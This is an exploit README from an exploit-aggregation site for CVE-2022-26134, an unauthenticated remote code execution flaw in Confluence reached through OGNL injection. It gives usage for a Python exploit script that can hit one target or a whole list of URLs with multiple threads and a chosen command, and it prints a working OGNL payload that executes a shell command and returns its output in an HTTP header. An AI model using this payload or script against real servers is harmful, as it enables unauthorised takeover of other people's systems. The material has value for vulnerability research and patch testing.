## https://sploitus.com/exploit?id=B47171B0-339A-582E-8AAC-3B18373664B7
# Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)
Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)
- On June 02, 2022 Atlassian released a security advisory for their Confluence Server and Data Center applications, highlighting a critical severity unauthenticated remote code execution vulnerability. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.
### IMPORTANT
This exploit is only intended to facilitate demonstrations of the vulnerability by researchers. I didn't recommend of illegal actions and take no responsibility for any malicious use of this script.
#### โข Request Example
![]()
### Exploit Usage
```
python3 exploit.py -h
Usage: exploit.py [options]
Options:
-h, --help show this help message and exit
-u URL, --url=URL Base target uri (ex. http://target-uri/)
-f FILEHOSTS, --file=FILEHOSTS
example.txt
-t THREADS_SET, --threads=THREADS_SET
-m TIMEOUT, --maxtimeout=TIMEOUT
-o OUTPUT, --output=OUTPUT
-c COMMAND, --cmd=COMMAND
```
#### Exploit single target:
`$ python3 exploit.py -u http://xxxxx.com -c id`
![]()
#### Exploit multitargets
`$ python3 exploit.py -f urls.txt -p -c id `
![]()
# OGNL expression
```${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}```
# References:
โข [https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html](https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html)
โข [https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis](https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis)